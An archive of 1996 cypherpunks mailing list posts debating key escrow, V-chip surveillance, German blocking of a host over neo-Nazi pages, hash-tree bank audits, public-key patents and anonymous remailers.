And loosely-coupling PCs, for a task such as Anonymous describes, does not
sound like terribly good preparation for other tasks. No point in
speculating further, as the speculations and counter-speculations are
underdetermined.


--Tim


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 10:25:24 +0800
To: cypherpunks@toad.com
Subject: The Press
Message-ID: <ad30195506021004bec7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:25 AM 1/28/96, Mark Allyn (206) 860-9454 wrote:
>
>I would like to make a suggestion that D. Denning; others
>who are pro-escrow/clipper; and some of you folks here on
>this forum get together for a debate.

There have already been several debates about Clipper. I recall one at
George Washington University, in D.C., with Prof. Lance Hoffmann as the
moderator, and the usual suspects on each side (Denning representing
Clipper, one or more of the EPIC/EFF/CPSR/ACLU folks on the other side).
Didn't change a lot of views, I suspect. And I'll bet a hundred bucks that
not a single Congresscritter saw the debate, either live (of course not) or
on C-SPAN (assuming it was carried).

And there was an IRC "town meeting" with DRD herself, though I don't recall
the details.

My point was that few cryptographers and computer scientists actively
support the pro-control, pro-GAK position, not that we need more
meaningless debates with Dorothy Denning, Donn Parker, and Stuart Baker.

>Ideally, this would be real nice on a TV show such as the
>McNiel Lehrer show on PBS. Barring that, I would think
>that an IRC chat channel could be set up so that they
>could get on line and engage in an on line discussion.

Absolutely not enough time. The News Hour with Jim Lehrer could only devote
at most 20 minutes to such a story. Hardly enough time to even explain the
issues to a public which has no idea whatsoever what PGP stands for, or
what key escrow means, etc. (Consider how many hours a week of reading this
list and other sources it took before you, the reader, knew which end was
up.)

And if the News Hour _did_ do such a report, they'd look to the canned
experts they have in their backyard: the EPIC/CPSR/ACLU Washington
staffers.

When major media outlets send a film crew out to California it's usually to
get crowd shots of those whacky "Cyberpunks" arguing about privacy. "Is the
head dead yet?"

But, of course, I would never discourage anyone from talking to the local
media. Maybe it will help. Sure. Fine. Whatever.

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 28 Jan 1996 08:59:05 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <Pine.BSD.3.91.960127114658.24287B-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.SV4.3.91.960127193741.11084F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



There is a story floating around XXXXXX circles that The Japanese carrier
approaching Pearl was spotted on the recently-installed (Navy) land radar
in Hawaii. The target was reported out of the ops room, but ignored by the
same situation room that screwed up (years later) the response to the
Pueblo's distress calls in international waters just offshore from North
Korea. 

Don't even ask me about the screwups I saw them make when I was stationed 
at a XXXXXX base  in XXXXXX

Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Sun, 28 Jan 1996 09:18:53 +0800
To: cypherpunks@toad.com
Subject: This post is rated LTC for `Low Technical Content'
Message-ID: <01I0IMFVB94Y99DH92@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## Time: 01/27/96 02:19 am ##
  Subject: This post is rated LTC for `Low Technical Content.' ]

>Date: Thu, 25 Jan 1996 18:04:21 -0800
>From: tcmay@got.net (Timothy C. May)
>Subject: Re: "This post is G-Rated"

>I see self-ratings of Usenet and mailing list posts as possible,
>just nearly worthless. And the reall contoversial stuff, this kind
>of goddamned fucking shit, will not get screened out. After all, I
>voluntarily rated this thread "G," and look what got through! (And
>it's only the tit of the iceberg, so to speak.)

The best solution has always seemed to me to be one of these three:

a.   Tags appended to notes/posts, from various reviewers, digitally
signed and otherwise coded to allow intelligent filtering, or

b.   Electronic distributions of reviewers' evaluations tagged to
notes in some simple way.  (I.e. give each note or post a unique ID
which appears in the message.)  Then, a smart newsreader/mail
program sorts the notes accordingly, or

c.   The reviewer reads the group/list, and rates posts according to
some useful criteria.  He then resends it out to his users, filtered
as desired.  (CP-LITE seems like a very early version of this.)

Any of these can be pretty easily ported to that magical set-top box
we hear so much about (no doubt running Windows '05).  In many ways,
(a) and (b) are easier.

>A meaningful "parental filter" cannot be done on-the-fly with
>self-ratings. Some minor steps can be taken, but not all worth the
>expense and hassle of a mandatory system.

Actually, I think in practice this will mean that programs get a
given rating, which is renewed every so often.  You don't rate
Melrose Place episode #89, you rate the entire series.

This whole idea offers two wonderful opportunities to control
content on TV.

First, get the TVs shipped with the V-chip filter turned on.  Most
people don't bother setting their VCR timers, and they also won't
bother setting this unless it denies them access to lots of shows
they like.  And, if turning the filter on and off is hard enough to
actually keep the average 12-year-old out, then it will be hard
enough that many families with kids will simply never change its
setting. They may even forget or lose the PIN that allows them to do
so. This means that you have a sizeable audience who depend on this
rating system, the only one readily available.

Second, apply pressure to television networks in whatever ways
necessary, by threatening a re-evaluation of their top-rated shows.
After all, ER really is a little gory for kids to be watching.  Oh,
you've decided to spend less time on covering the losses in the
great Bosnian Peace Initiative?  Well, I suppose a little real-life
drama won't hurt anyone.  If the V-chip is used widely at all, this
represents a really useful threat.  What happens to the network
executive who gets ER to lose half its audience, even just for a few
weeks while a review board takes up the network's appeal?

>--Tim
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey@delphi.com / kelsey@counterpane.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQrIiUHx57Ag8goBAQGhIAQA2F3guHlTnebja5fcGwEwOKx3CwdhAs90
zn6Di+nztSoGt6JF2kIC60zsfVHgQ//RJcMtuiFzBsQoTn/E56JM2mZ4vJpsfipO
lVbKlZ1HylDyGLcF/pBllBVfvmXLjpvu0OXkFt3yqEohjaNlF7l49bOz28ngLv/A
CATYZGlDP64=
=6BO+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 28 Jan 1996 04:11:11 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: OFFSHORE RESOURCES  (where?)
In-Reply-To: <Pine.SUN.3.91.960126093953.26235A-100000@crl.crl.com>
Message-ID: <Pine.BSD.3.91.960127195429.20232D-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



	that's nice, Sandy.  but where is URL?


On Fri, 26 Jan 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> There has been sporadic interest on this list with regard to
> offshore incorporation, banking, etc.  While ads for offshore
> services are common in the international press, until now, none
> of these companies has an Internet presence.  
> 
> THE ECONOMIST has an ad for OCRA, a group that specializes in
> offshore company services.  What's new is that they have a Web
> page.  It includes a good primer on the benifits from going 
> offshore and on selected offshore jurisdictions.  I've never done
> business with these folks, but they have good info.
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 28 Jan 1996 09:35:42 +0800
To: Mark Allyn 860-9454 <allyn@allyn.com>
Subject: Re: Denning's misleading statements
In-Reply-To: <199601280025.QAA24212@mark.allyn.com>
Message-ID: <kl2gs=G00YUvQWZIYI@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 27-Jan-96 Re: Denning's misleading
st.. by Mark Allyn 860-9454@ally 
> I would like to make a suggestion that D. Denning; others
> who are pro-escrow/clipper; and some of you folks here on
> this forum get together for a debate. 
>  
> Ideally, this would be real nice on a TV show such as the
> McNiel Lehrer show on PBS. Barring that, I would think 
> that an IRC chat channel could be set up so that they
> could get on line and engage in an on line discussion.

I doubt that they'd be interested, but if they are, Jon Lebkowsky of
EFF-Austin hosts Electronic Frontiers, a HotWired online discussion
forum, every Thursday night at 10 pm. The subject would fit in nicely
with his discussions; this week he had Steve Jackson, of Steve Jackson
Games.

I'm sure we could interest him in this.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jan 1996 11:39:02 +0800
To: cypherpunks@toad.com
Subject: Escrowing Viewing and Reading Habits with the Government
Message-ID: <ad302c6f0002100460e2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:59 AM 1/28/96, Lucky Green wrote:

>Of course the V-Chip transmits the ID number of the program to be rated
>upstream. Since all programs will be rated by the chip, regardless if you
>choose to use the rating or not, the exact channel you are watching will be
>tracked and logged.
>
>Have fun,

This is a serious misstatement of the proposal! I am shocked, simply
shocked. If Lucky only knew what I know...

The logged information is only available to law enforcement if they have a
legitimate need to know, as evidenced by a valid court order, an
authorization from the Foreign Intelligence Surveillance Court, a request
by a regional or local police department, or upon suspicion that a sex
offender or pedophile is displaying too much interest in children's shows
or "Baywatch."

The "Library Awareness Program," administered by the Justice Department, is
designed to identify potential criminals before they have a chance to
commit their deeds. The visits to libraries made by the FBI are used to
determine who is reading subversive or dangerous material. According to
Director Freeh, "If we had had this program in place when Timothy McVeigh
was a child, we could have detected his interest in ANFO and picked him up
for reeducation, or at least recruited him for the CIA's Lockerbie team."

Finally, I am confidant the the viewing habits "escrowed" with the
government will only be used for good purposes. The policeman is our
friend.


--Klaus!

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 11:51:54 +0800
To: cypherpunks@toad.com
Subject: "German service cuts Net access" (to Santa Cruz)
Message-ID: <ad302f3f010210040a20@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



[I sent this to the Cyberia list, but it seems likely to have some interest
for Cypherpunks. Apologies to those who get it twice.]

More interesting news from my own backyard:

"German service cuts Net access: Neo-Nazi materials posted on Web by Santa
Cruz company"

San Jose Mercury News, 1996-01-27, D1

"Germany's biggest Internet provider has blocked access to a Santa Cruz
computer service that makes available neo-Nazi propaganda in another sign
of the growing tension over material available on the Internet.

"Deutsche Telekom, Germany's national phone company, blocked its 1 million
customers Thursday from gaining access to Internet "Web sites" maintained
by customers of Web Communications of Santa Cruz.

"The 18-month-old company offers customers the ability to self-publish
material on the World Wide Web, a fast-growing subsection of the Internet.
Among its 1,500 custoemrs is a Canadian manwho has posted material that
questions the existence of the Holocaust.

""We want to make it very clear we condemn anti-Semitism, racism and hatred
in any form," said company president Chris Schefler. But "we do not
monitor, police or control the content of any of our customer sites.""

----

I'd quote more from the article, but I think I'm at about the limit of fair
use quotation. I expect the story will be picked up nationally; it was on
several t.v. shows last night and today.

For those interested--though merely including this information could I
suppose cause the William and Mary site to be similarly turned off, the
page in question is noted Revisionist Ernst Zuendel, or Ontario, Canada.
His Web page at Webcom can be found by searching on Zuendel or Zundel and
the usual other terms: holocaust, revisionism, Webcom, etc. (I tried last
night to connect to Zuendel's page, and couldn't. Nor could I connect to
www.webcom.com, so they may be having problems.)

Apparently irate users at Webcom, whose pages are likewise now inaccessible
to Germany, are clamoring to have Zuendel thrown off, so that all good
Germans can once again access their pages.

The implications of this are fairly clear. I'm not sure if there are any
U.S. _legal_ questions, except that Zuendel and similarly controversial
material is protected by customer agreements (as Schlefler notes, Zuendel
has violated no user rules, and so Webcom cannot kick him off for rule
violations).

What next? AOL and Compuserve turn off access to the many European
countries that have Web pages containing what we call "child porn" (but
which is legal in the Netherlands, Denmark, etc.), Bangla Desh turns off
access to sites that have pages describing the cooking of beef, and Iran
turns off access to any country that allows women to have a presence on
their systems?

A good thing Web proxies (remailers for http accesses) are so far along!

By the way, I saw Schlefler being interviewed. I'll keep you posted.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jdoe-0007@alpha.c2.org
Date: Sun, 28 Jan 1996 14:30:31 +0800
To: cypherpunks@toad.com
Subject: PIDAHO and EUDORA PRO 2.2
Message-ID: <199601280517.VAA14669@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In response to the "what has John Doe got that PIDAHO doesn't" messages I tried to
PIDAHO v2.6b.  I am unable to make it work.  Messages from PIDAHO can not be sent to
the selected and OnLine EUDORA PRO application.  I also suspect that it has something to do with the fact  PIDAHO is a 16bit app and EUDORA PRO v2.2 is 32bit.  I am running it on a WIN95 internal tcp/ip stack to a dial up ppp connection.

Any help and or advice would be sincerely appreciated.

John Doe -0007




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 28 Jan 1996 14:17:37 +0800
To: John Young <cypherpunks@toad.com
Subject: BAA_bab
Message-ID: <199601280536.VAA01365@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain



 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 28 Jan 1996 14:24:04 +0800
To: cypherpunks@toad.com
Subject: Hash trees and bank solvency.
Message-ID: <199601280537.VAA01455@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


I publish this trivial and obvious idea, because if I do not,
publish it, some clown will surely patent it.

(Has the patent on chewing gum and walking at the same time
been taken yet.  The more outrageous patents the patent office
issues, the more power and influence they get and the more funds
they recieve.)

One of the great hazards with banking, and with financial services 
similar to banking, is that the financial institution has the 
opportunity to steal a great deal of money.

One solution to this problem is government auditors.  Government
inspectors, unlike private auditors, can force their way in, in
the early hours of the morning, and as each bank employee turns up,
take him to a separate cubicle and interogate him with a gun in
one hand and an account book in the other.  This makes it difficult
for the financial institution to fabricate a misleading picture of
its financial situation.

A hash tree can provide proof to a banks customers that the bank only
has the amount outstanding that it claims to have, without the need
for gunmen to check the totals.

At the close of month, the customer accounts are orgnized into a hash 
tree with the totals forming part of the hash

Each node is a hash of the two nodes below it, and the amounts of money in
the two nodes, and the sum of those two amounts.

Each customer can then see that the money the bank owes him is a part of
the total the bank claims to owe.  If a customer discovers he is not 
part of the hash tree, he knows the bank, or financial institution,
understates its indebtedness;

No auditors, government or otherwise, required.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 28 Jan 1996 14:26:10 +0800
To: <cypherpunks@toad.com>
Subject: When do patents expire on Rabin's public key scheme?
Message-ID: <199601280538.VAA01588@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


When do patents expire on Rabin's public key scheme?

RSA claims that the Diffie Helman patent, which expires on the 29th of
April, 1997, covers all public key cryptography.

ElGamal and Rabin are unpatented.

Schmeier says that ElGamal will be free of patent restrictions after that,
but he says nothing about Rabin.

Rabin's encryption and signatures take up the same amout of space as RSA
signatures, and encryption, but ElGamal takes up twice the space, thus Rabin
seems preferable to ElGamal.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Sun, 28 Jan 1996 11:26:02 +0800
To: cypherpunks@toad.com
Subject: Re: This post is rated LTC for `Low Technical Content'
Message-ID: <Pine.BSD/.3.91.960127213612.11393A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



shamrock@netcom.com (Lucky Green) quoth:
>Of course the V-Chip transmits the ID number of the program to be rated
>upstream. Since all programs will be rated by the chip, regardless if you
>choose to use the rating or not, the exact channel you are watching will be
>tracked and logged.

Ahh.. Finally a use for anonymous remailers that the Christian right 
would understand.

      Weld Pond   -  weld@l0pht.com      -     http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 28 Jan 1996 14:31:54 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <v02120d00ad30b69c3e45@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:53 1/28/96, Alex de Joode wrote:
>Belgian TV (the dutch language channel) has a page on teletext (Ceefax)
>[I don't think US tv has that feature] stating that the French backbone
>is thinking about blocking sites that provide information that they deem
>ethicly unacceptable, like sites that promote the denial of Konzentrations
>Lagers, the extreme right, pornografic and pedophile sites.

Wonder how long before they will include gereral purpose proxies in the
proposed ban.

We should start a "banned websites pool". If a site gets banned, the
controversial content will be mirrored at all other sites. There are enough
ISPs on this list to make that happen. Will they have the courage?

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 28 Jan 1996 14:51:22 +0800
To: cypherpunks@toad.com
Subject: Re: RANT: When hi-tech is a hinderance (freedom w/in limits)
Message-ID: <199601280626.WAA04730@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:48 AM 1/28/96 +0100, Anonymous wrote:
>
> A short 'rant' on techno-dinosaurism...
> 
> Or look back to the 13th century when European soldiers were
> high-tech wearing tons of armor and used cross bows.  it was
> imposing high-tech for the time, but they couldn't move fast or
> fire arrows quickly... and they were skagmeat for Mongols
> who were comparatively low-tech.

This is incorrect:  The Mongols had superior technology to the 
people they conquered.  In particular Mongol arrows could penetrate
armor more effectively than anybody else's arrows, and Mongol siege
engines could level city walls far more effectively than anybody
else's siege engine.

It might well seem strange that nomads had higher technology, but
urban civilization of that era was in a twilight era and suffered
great technological stagnation and regression.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 28 Jan 1996 15:02:14 +0800
To: cypherpunks@toad.com
Subject: Re: Hash trees and bank solvency.
In-Reply-To: <199601280537.VAA01455@mailx.best.com>
Message-ID: <199601280643.WAA22528@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"James A. Donald" <jamesd@echeque.com> writes:

 > One solution to this problem is government auditors.
 > Government inspectors, unlike private auditors, can force
 > their way in, in the early hours of the morning, and as each
 > bank employee turns up, take him to a separate cubicle and
 > interogate him with a gun in one hand and an account book in
 > the other.  This makes it difficult for the financial
 > institution to fabricate a misleading picture of its
 > financial situation.

This would be killing a mosquito with a flyswatter. Besides, the
employees of a financial institution may be in no position to
accurately state its financial situation, even if they are in
little cubicles with guns to their heads.

A somewhat more civilized method is used by my broker, who gets
audited on a regular schedule by one of the major accounting
firms.  The accounting firm puts an insert into every statement
periodically, with an envelope addressed to the accounting firm,
asking the customer to carefully examine the enclosed statement
and to contact them if it is not entirely accurate.

 > A hash tree can provide proof to a banks customers that the
 > bank only has the amount outstanding that it claims to
 > have, without the need for gunmen to check the totals.

 > At the close of month, the customer accounts are orgnized
 > into a hash tree with the totals forming part of the hash

 > Each node is a hash of the two nodes below it, and the
 > amounts of money in the two nodes, and the sum of those two
 > amounts.

 > Each customer can then see that the money the bank owes him
 > is a part of the total the bank claims to owe.  If a
 > customer discovers he is not part of the hash tree, he knows
 > the bank, or financial institution, understates its
 > indebtedness;

I would trust the typical customer to mail back a form to an
outside auditor far more than I would trust him to examine a hash
tree, check his own entry, check the neighborhood of his own
entry for cryptographic integrity, and sound an alarm.

To be perfectly candid, I would not even want the task of
explaining to the typical banking customer what a hash tree was.

The outside auditor can of course be spoofed by giving him access
only to some subset of customer accounts.  The hash tree can be
spoofed by not telling a subset of customers of its existance.

All things considered, I think I would prefer the auditor.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 28 Jan 1996 12:16:39 +0800
To: hallam@w3.org
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <9601280359.AA12033@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>They probably should do, the NSA was critical in ensuring the demise
>of the USSR and in maintaining stability throughout the cold war period.

Please explain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MatriX Spider <matrix@citenet.net>
Date: Sun, 28 Jan 1996 13:10:01 +0800
To: cypherpunks@toad.com
Subject: Subscription
Message-ID: <9601280444.AA08368@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to subscribed to this mailing list.

Thanks for your time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Sun, 28 Jan 1996 13:05:53 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "German service cuts Net access" (to Santa Cruz)
In-Reply-To: <ad302f3f010210040a20@[205.199.118.202]>
Message-ID: <Pine.OSF.3.91.960127234305.16477D-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



	Ernst Zuendel is the head of a neo-nazi group based in Toronto
Canada who has been to court several times for violating Canada's 'hate
speech' laws. If I remember correctly he has been convicted for publishing
this kind of stuff here in Canada.  
	Mr Zuendel is, unfortunatly, one of those unsavoury causes that
free speech people are forced into defending to protect a principle. What
he is doing from an American (I assume it is American) provider is illegal
in Canada. The Canadian law is foolish and the new technology of the
Internet is proving it to be so. 
	I wonder how long before the German government realizes that by
chopping of access to parts of the Internet, they are only hurting
themselves.  They will soon suffer a technological 'death by a thousand
cuts' if they continue on their present course. 
	The disturbing thing about all of this is that they may become an
example of a 'successful' stratagy to combat the four modern horsemen of
the apocalypse. 
Regards, 
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Pugh <ampugh@mci.newscorp.com>
Date: Sun, 28 Jan 1996 13:23:13 +0800
To: cypherpunks@toad.com
Subject: "German service cuts Net access" (to Santa Cruz)
Message-ID: <199601280459.XAA15779@kafka.delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


>"Germany's biggest Internet provider has blocked access to a Santa Cruz
>computer service that makes available neo-Nazi propaganda in another sign
>of the growing tension over material available on the Internet.
>
>"Deutsche Telekom, Germany's national phone company, blocked its 1 million
>customers Thursday from gaining access to Internet "Web sites" maintained
>by customers of Web Communications of Santa Cruz.



At least my local paper got it right in the AP article they published on this...

"The block - analogeous to the government ordering a bookstore to take every
book by a given publisher off the shelves because it objected to one title -
was imposed Thursday." 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 28 Jan 1996 13:24:59 +0800
To: allyn@allyn.com (Mark Allyn)
Subject: Re: Denning's misleading statements
In-Reply-To: <199601280025.QAA24212@mark.allyn.com>
Message-ID: <199601280502.AAA15901@homeport.org>
MIME-Version: 1.0
Content-Type: text


Mark Allyn wrote:

| I would like to make a suggestion that D. Denning; others
| who are pro-escrow/clipper; and some of you folks here on
| this forum get together for a debate. 

	Why bother?  Denning's position is that we'll go away.  By
deploying remailers, PGP, and other pro-privacy technologies, we
change the terms of the debate, and we change the facts that they must
deal with.

	Write code, not rants.  I wrote a mixmaster installer script
recently to make installing a Mixmaster easy.  (You can get it by
sending me a message with a "Subject: get mixmaster".)  I'm working on
code to allow a Mixmaster to only send to other mixmasters, and local
users.  This would allow people to covertly run a Mixmaster, avoiding
the headache of having anonymized messages come from your site.

	Now and then, debating with Denning and the like is fun.  But
she's a statist, and I'm not.  We aren't going to see eye to eye on
this stuff, so rather than responding, with detailed arguments,
respond with code that does new & nifty stuff. A GUI version of
premail would be cool, as would a key management utility for handing
PGP keyrings and webs of trust.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 28 Jan 1996 15:02:35 +0800
To: cypherpunks@toad.com
Subject: Re: "German service cuts Net access" (to Santa Cruz)
Message-ID: <ad30597900021004ba4e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Detweiler will foam and rant that I am acting as a stooge for the NSA
(though he used to be on the side of the NSA and violently opposed to our
views...go figure), but I feel it important to point out a few things for
ISPs to consider:

At 5:54 AM 1/28/96, Lucky Green wrote:

>Wonder how long before they will include gereral purpose proxies in the
>proposed ban.
>
>We should start a "banned websites pool". If a site gets banned, the
>controversial content will be mirrored at all other sites. There are enough
>ISPs on this list to make that happen. Will they have the courage?

Consider some points:

* the Germans recently arrested an American who landed in Germany
somewhere, as part of a trip. It seems he had been involved with the
production of Neo-Nazi material, somewhere out west. This was the last I
heard about the story. Sorry, I'm going from carbon-based memory.

* the Germans had kept a record of certain names, and picked him up for
violation of their laws about hate crimes, Holocaust revisionism, etc.

* consider how much easier it is getting to store the names of those who
violate the laws of a country.

I would not want to be the operator of a site which mirrored the Zundelsite
if I ever expected to pass through Germany. Or possibly any other country
which has liberal extradition arrangements with Germany.

At least the Germans don't snatch people from other countries, as the U.S.
and Israel have done.

By the way, while I haven't heard what happened to the American nabbed when
he landed in Germany--the story was a few weeks or months ago, as I
recall--there was a humorous slant to the story. Seems the American was
going on and on about his Constitutional rights to free speech....


--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sun, 28 Jan 1996 08:42:15 +0800
To: futplex@pseudonym.com
Subject: Re: SHA-2
Message-ID: <199601280033.TAA09429@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


futplex@pseudonym.com (Futplex) writes:

>Any particular reason someone called this SHA-2 ?  It sounds a whole lot like
>the revision of the original SHA, called SHA-1, that came out quite a while
>ago. (FIPS 180-1)  This is rather old hat unless they're making a _second_
>revision to the standard, in which case I expect there would have been much
>more noise made about it.

